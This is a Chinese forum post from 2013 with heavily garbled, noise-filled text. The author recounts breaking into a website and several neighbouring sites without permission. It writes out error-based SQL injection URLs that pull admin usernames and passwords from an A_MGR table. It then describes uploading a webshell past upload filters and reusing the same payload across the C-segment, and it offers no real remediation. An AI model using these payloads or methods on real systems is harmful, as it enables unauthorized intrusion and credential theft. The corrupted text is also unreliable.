发现一个注入点+ K7 L/ _8 a8 A. v! {# g/ _: p% P
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833891 N( \7 t7 ?' P8 X ]3 z( z
: T W8 g, Y; |4 @% G
习惯性的加’having1=1--$ h3 q, |; L/ U# C
! @4 j0 m# s* ?) G* _http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—& {/ l6 c& c$ w8 ~2 m; s) h
& x4 A- h H$ J% z7 C; @6 ~
0( i; Q! P$ p* v. M! x7 {; x8 ]
4 R( a6 V3 x2 k8 p! y& {# Q
爆出Diary_A.dl_Title(这时候很激动啊): a0 c( A, |1 Z% @! p
$ n0 @6 F L5 D/ d6 z- o那么继续
1 C2 n4 j- o/ ?0 B9 s J) Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—7 m% u0 a9 q2 f# H8 m0 O; w6 W
! u3 @& L# H( y3 [+ ^+ I5 W7 Q
继续,一直爆下去7 h, T( v* |: h
( A# Q& W% }8 s* Q4 U爆到几个字段和表段 但是没找到需要的管理用户的字段" j* z# v9 \# i4 [( w: S
0 T( |- W9 P1 W( f3 R) }/ u
蛋疼了 怎么办 然后去后台登陆页看源码
; W9 M. Q2 k: g2 v( }! U2 q; Z% l& k4 k
0
+ K; y1 a. p3 X2 }7 a' U# s; l3 F+ e2 B I
Input name= “ADUID”* e1 ]. i0 g1 i5 |/ T
Input name= “ADPWD”
2 U( {3 }2 f: R: {7 [7 ]: s5 I
9 N0 H+ O1 q$ C( a; G! }$ e$ ^很幸运 找到了字段那就继续; l( n2 b1 [/ s0 Z& |6 @
找到之后开始爆用户
! i& i& D2 T: ?http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—6 }1 E r* W8 i5 J
爆密码
% G5 C$ b) N6 Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
: A0 {. W& X7 N8 b J: k测试了下 这个注入点只能爆到文章哪里的表
% B' O$ e, [1 X+ s) P4 Y0 _+ I
) f& d' h3 n! q- g. J' Q+ Y& h. Z7 j% J头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
5 R- X; T* O4 q' }* m+ l9 ?/ M
4 U* @. u9 i0 e" ?2 G; J9 v; \又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
6 C( M! t! d9 \
1 x) i) @) }; V4 {' c473 u* g' _! {$ G' c/ h
+ r1 a3 W2 b* [. J1 H进后台3 g0 M1 A0 X- m* `3 |" e, }6 ?1 q
3 u( E, o9 `( D6 `% {2 P) X, Q: O* C$ j& [8 f" i
发现几个上传点 有的地方不能上传 而且防止恶意代码0 S4 Q5 c5 O% H; X- G/ p
( N* B9 D$ N# j0 X' w$ t( r7 {没办法 各种百度各种找大牛 找到一只好像可以突破的马$ Z# s+ _2 t* v8 S. W: ]# {) `
' F) f& g7 o# }
$ J* i1 V+ Y- O% x' Z在系统管理那里直接上传 不过没有显示地址 x. B% @0 k: _0 D% w
0 ]+ b! o4 V7 J7 @" ~; W再上传一次 抓包 搞定OK1 X8 w5 p2 `* r" m
0 x. ]5 w9 O" h( e% B; u* V1 [5 P# o2 u
' _. u/ y8 U3 k: t" O472* m7 S' u" [) w& X, V3 Y
0 }, L1 k4 x7 G$ l8 a! c
晚上不行了 去睡觉。。。
) S3 @2 d8 {5 W/ b- ~第二天刚起床 闲的没事做继续日站吧
G! `' _7 t P, E9 o2 A2 D" |3 k( Q9 Q+ {( @' k
找个站 就把这个站的旁c扫了下1 R, J. C! g# q$ n
/ ^5 ^5 ]7 e" D发现c段也有一个购物站 ,然后还和这个站的模板差不多; z( a r2 \' ^ I" W' E
" F2 `% q5 [5 s1 i1 q0 p. T就找到会员登录口测试
' c( O8 g* p; V* Z# x2 A
8 v0 k. y4 ?# M; b4 k7 a5 D'and (select top 1 MGR_UID from A_MGR)>0—
" ~2 A' v% X7 X K6 |. W$ [果断爆到了 这时候我很激动 通杀/ P v( [* Q# G& M
6 G% S1 v# }* `8 N! W
再次翻c段
; P* J' V* {% X+ t# @) z# C% G. r" m& {) C: N: V _7 m4 `* L% t* j# i; \1 S
翻出几个站 都成功拿下" I( M, _0 \- e& y }
8 l, B- ?' [' }. l* x
% V7 w3 S% K/ [
8 ]5 ]4 Q' { L) c4 l# {修复方案:
) p- R' A$ P7 }/ D) G他们比我专业
8 ]! I& a5 H$ }) f s: u
6 E# j: w1 E% H8 m/ K
* S! ^2 }, o w" p- ]$ M. P: ]6 w" ~. j: T$ O3 h
|
发表于 2013-4-4 17:40:38
收藏
支持
反对